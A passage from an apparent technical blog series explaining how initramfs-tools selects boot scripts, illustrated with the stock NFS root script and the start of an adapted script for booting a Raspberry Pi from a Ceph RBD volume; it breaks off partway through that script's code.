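<code>/etc/initramfs-tools/modules</code> and the initramfs gets rebuilt. A sketch for the RBD
case from later in this series (module dependencies are normally pulled in automatically):</p>
<pre tabindex="0"><code># As root: make sure the rbd module ends up in the initramfs
echo &#34;rbd&#34; &gt;&gt; /etc/initramfs-tools/modules
update-initramfs -u
</code></pre>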
<p>Next comes some sourcing of root device specific scripting. Both the <code>local</code> disk
and <code>nfs</code> scripts are always sourced. The interesting part of this sourcing is
this line, though:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>. /scripts/<span style="color:#e6db74">${</span>BOOT<span style="color:#e6db74">}</span>
</span></span></code></pre></div><p>As I wrote above, the content of the <code>boot</code> command line option, stored in the
<code>BOOT</code> variable, determines which script is used for booting. So when you
implement your own mount type for the root disk, you can just place a script
called something like <code>my-boot-method</code> into <code>/etc/initramfs-tools/scripts/</code>,
and it will end up in the <code>/scripts</code> directory of the initramfs. Then, you
add <code>boot=my-boot-method</code> to your kernel command line, and initramfs will source
that script here.</p>
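<p>Putting that into commands, installing a custom boot method might look like this
(the script name is the hypothetical one from above):</p>
<pre tabindex="0"><code># As root: install the boot script and rebuild the initramfs
cp my-boot-method /etc/initramfs-tools/scripts/my-boot-method
update-initramfs -u
# Then add &#34;boot=my-boot-method&#34; to the kernel command line
# (on a Pi: cmdline.txt on the boot partition)
</code></pre>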
<p>Those scripts have a very specific structure, demonstrated by the lines which
follow the sourcing and do the actual root mounting:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount_top
</span></span><span style="display:flex;"><span>mount_premount
</span></span><span style="display:flex;"><span>mountroot
</span></span></code></pre></div><p>These three lines call the functions which are expected to mount the actual root
device. These functions are overwritten in each of the scripts, so that whatever
script is named in <code>BOOT</code> will provide the implementation for those three
functions.</p>
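<p>As a minimal sketch of that structure (not a working boot method, just the skeleton such a
script has to provide; the mount command is a placeholder):</p>
<pre tabindex="0"><code># /etc/initramfs-tools/scripts/my-boot-method -- skeleton only
mount_top()
{
	# one-time setup before any mounting starts
	:
}

mount_premount()
{
	# runs right before mountroot, e.g. waiting for devices
	:
}

mountroot()
{
	# must leave the root filesystem mounted on ${rootmnt}
	mount /dev/my-root-device &#34;${rootmnt}&#34;
}
</code></pre>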
<h1 id="nfs-as-an-example-of-how-it-works">NFS as an example of how it works</h1>
<p>Because NFS is implemented as a root disk option by default, I will use it as
an example. And while I don&rsquo;t understand it, I still recognize that not everybody
wants to run a Ceph cluster. &#x1f609;</p>
<p>The NFS root disk scripting can be found at <code>/usr/share/initramfs-tools/scripts/nfs</code>.</p>
<p>The important parts of the functionality are the following two functions:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nfs_mount_root<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>        nfs_top
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># For DHCP</span>
</span></span><span style="display:flex;"><span>        modprobe af_packet
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        wait_for_udev <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># Default delay is around 180s</span>
</span></span><span style="display:flex;"><span>        delay<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTDELAY<span style="color:#66d9ef">:-</span>180<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># loop until nfsmount succeeds</span>
</span></span><span style="display:flex;"><span>        nfs_mount_root_impl
</span></span><span style="display:flex;"><span>        ret<span style="color:#f92672">=</span>$?
</span></span><span style="display:flex;"><span>        nfs_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>nfs_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[</span> $ret -ne <span style="color:#ae81ff">0</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying nfs mount&#34;</span>
</span></span><span style="display:flex;"><span>                sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>                nfs_mount_root_impl
</span></span><span style="display:flex;"><span>                ret<span style="color:#f92672">=</span>$?
</span></span><span style="display:flex;"><span>                nfs_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> nfs_retry_count <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>nfs_mount_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>        configure_networking
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># get nfs root from dhcp</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;auto&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                <span style="color:#75715e"># check if server ip is part of dhcp root-path</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTPATH#*:<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTSERVER<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># nfsroot=[&lt;server-ip&gt;:]&lt;root-dir&gt;[,&lt;nfs-options&gt;]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                <span style="color:#75715e"># nfs options are an optional arg</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT#*,<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSOPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o </span><span style="color:#e6db74">${</span>NFSROOT#*,<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>                NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>NFSROOT%%,*<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT#*:<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span>$NFSROOT<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTSERVER<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSOPTS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                NFSOPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o retrans=10&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        nfs_premount
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>readonly?<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> y <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o ro&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o rw&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># shellcheck disable=SC2086</span>
</span></span><span style="display:flex;"><span>        nfsmount -o nolock <span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>NFSOPTS<span style="color:#e6db74">}</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt?<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>The <code>nfs_mount_root</code> function is called by the <code>mountroot</code> function mentioned
in the main <code>init</code> script.
It is mainly responsible for implementing a retry mechanism.</p>
<p>The actual mount happens in the <code>nfs_mount_root_impl</code> function. First, it reads
the <code>nfsroot</code> kernel parameter. This has the format <code>nfsroot=[&lt;server-ip&gt;:]&lt;root-dir&gt;[,&lt;nfs-options&gt;]</code>.
As an example, the option would be <code>nfsroot=10.0.0.15:/serverroots/server1</code> if
the NFS server was running on <code>10.0.0.15</code> and the root for the current server
was <code>/serverroots/server1</code> on that NFS server.</p>
<p>The <code>nfsmount</code> utility called at the end of the function to execute the mount
is another small helper program similar to <code>run-init</code> in that it is only part
of the initramfs and linked against klibc. Its source code can be found
<a href="https://git.kernel.org/pub/scm/libs/klibc/klibc.git/tree/usr/kinit/nfsmount">here</a>.</p>
<p>And that&rsquo;s it already. By setting the <code>boot=nfs</code> and <code>nfsroot=...</code> options
on your kernel command line you can boot with a root disk located on NFS. This
is functionality you don&rsquo;t need to implement yourself; it is already part of
the kernel and the default <code>initramfs-tools</code>. This also already works fine
with Raspi OS.</p>
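<p>Putting it together, a kernel command line for an NFS root could look like this, reusing the
example values from above (note that <code>root=/dev/nfs</code> selects the nfs boot script
automatically, as seen in the command line parsing earlier):</p>
<pre tabindex="0"><code>root=/dev/nfs nfsroot=10.0.0.15:/serverroots/server1 ip=dhcp ro
</code></pre>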
<h1 id="booting-from-a-ceph-rbd-volume">Booting from a Ceph RBD volume</h1>
<p>Now finally to the reason we&rsquo;re doing all of this: Booting not from NFS or a local
disk, but from RBD. There are a number of details which need to be configured
to actually get an initramfs which can boot into an RBD volume. Details on that
will come in the next article of the series, in which I will present a HashiCorp
Packer image and Ansible playbook to generate a Raspberry Pi image which netboots
and uses an RBD volume as the root disk.</p>
<p>Here, I will concentrate only on the necessary initramfs scripting to get it
working.</p>
<p>As noted above, new scripts/boot methods can just be dropped into <code>/etc/initramfs-tools/scripts</code>.
All of the following code should be put into a file called <code>rbd</code> in that directory.</p>
<p>Most of the code for booting from an RBD volume comes from <a href="https://github.com/ltsp/ltsp/pull/50">this</a>
pull request and has been lightly adapted by me.</p>
<p>As said before, the basic idea is that the <code>init</code> script sources the file in
<code>/scripts/$BOOT</code>, overwriting three functions which it then calls. The most
important of these is <code>mountroot</code>. In the RBD implementation, this function calls
<code>rbd_mount_root</code>, which looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_mount_root<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	export RBDROOT<span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># Parse command line options for rbdroot option</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">for</span> x in <span style="color:#66d9ef">$(</span>cat /proc/cmdline<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">case</span> $x in
</span></span><span style="display:flex;"><span>		rbdroot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>			RBDROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>x#rbdroot=<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>			;;
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	rbd_top
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	modprobe rbd
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># For DHCP</span>
</span></span><span style="display:flex;"><span>	modprobe af_packet
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	wait_for_udev <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># Default delay is around 180s</span>
</span></span><span style="display:flex;"><span>	delay<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTDELAY<span style="color:#66d9ef">:-</span>120<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># loop until rbd mount succeeds</span>
</span></span><span style="display:flex;"><span>	rbd_map_root_impl
</span></span><span style="display:flex;"><span>	rbd_map_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>rbd_map_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>		<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span>$dev<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying rbd map&#34;</span>
</span></span><span style="display:flex;"><span>		/bin/sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		rbd_map_root_impl
</span></span><span style="display:flex;"><span>		rbd_map_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> <span style="color:#e6db74">${</span>rbd_map_retry_count<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span>$dev<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		echo <span style="color:#e6db74">&#34;ERROR: RBD could not be mapped&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># loop until rbd mount succeeds</span>
</span></span><span style="display:flex;"><span>	rbd_mount_root_impl
</span></span><span style="display:flex;"><span>	rbd_mount_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>rbd_mount_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>		<span style="color:#f92672">&amp;&amp;</span> ! chroot <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> test -x <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>init<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying rbd mount&#34;</span>
</span></span><span style="display:flex;"><span>		/bin/sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		rbd_mount_root_impl
</span></span><span style="display:flex;"><span>		rbd_mount_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> <span style="color:#e6db74">${</span>rbd_mount_retry_count<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>To begin with, the <code>rbdroot</code> option is read from the kernel command line
and put into a variable. This variable will later be interpreted to provide the
necessary credentials and configs to get the right RBD volume from the Ceph
cluster.
An example value would be <code>rbdroot=10.86.5.105,10.86.5.102,10.86.5.104:AUTHX-USERNAME:AUTHX-PASSWORD:mypool:myvolume::_netdev,noatime</code>.</p>
<p>Next, the necessary kernel modules are loaded; these modules need to be available
in the initramfs.</p>
<p>Then follows the actual mounting. For Ceph RBD volumes, this happens in two
steps. The first is mapping the volume to the local host, which creates a device
file under <code>/dev</code>. The second is mounting that device just like any other disk,
depending only on the volume&rsquo;s filesystem.</p>
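<p>For comparison, outside the initramfs the same two steps would normally be done
with the <code>rbd</code> CLI. A minimal sketch, assuming the Ceph config and keyring are in
place and using the placeholder pool and image names from the example above:</p>
<pre tabindex="0"><code># step 1: map the image; the command prints the device node, e.g. /dev/rbd0
rbd map mypool/myvolume --id AUTHX-USERNAME
# step 2: mount that device like any other disk
mount /dev/rbd0 /mnt
</code></pre>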
<p>The first step, the mapping, is done in the <code>rbd_map_root_impl</code> function, which
looks as follows:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_map_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>	configure_networking
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># get rbd root from dhcp</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;x</span><span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xauto&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		RBDROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	local mons user key pool image snap partition
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># rbdroot=&lt;mons&gt;:&lt;user&gt;:&lt;key&gt;:&lt;pool&gt;:&lt;image&gt;[@&lt;snapshot&gt;]:[&lt;partition&gt;]:[&lt;mountopts&gt;]</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		local i<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		local OLD_IFS<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>IFS<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		IFS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;:&#34;</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">for</span> arg in <span style="color:#e6db74">${</span>RBDROOT<span style="color:#e6db74">}</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>			<span style="color:#66d9ef">case</span> <span style="color:#e6db74">${</span>i<span style="color:#e6db74">}</span> in
</span></span><span style="display:flex;"><span>				1<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					mons<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span> | tr <span style="color:#e6db74">&#34;;&#34;</span> <span style="color:#e6db74">&#34;:&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				2<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					user<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				3<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				4<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					pool<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				5<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					<span style="color:#75715e"># image contains an @, i.e. a snapshot</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>arg#*@*<span style="color:#e6db74">}</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>						image<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg%%@*<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>						snap<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg##*@<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>						image<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>						snap<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>					<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				6<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>					partition<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>					;;
</span></span><span style="display:flex;"><span>				7<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    mountopts<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>arg<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                      ;;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span>			i<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span><span style="color:#e6db74">${</span>i<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>		IFS<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>OLD_IFS<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># the kernel will reject writes to add if add_single_major exists</span>
</span></span><span style="display:flex;"><span>	local rbd_bus
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -e /sys/bus/rbd/add_single_major <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>		rbd_bus<span style="color:#f92672">=</span>/sys/bus/rbd/add_single_major
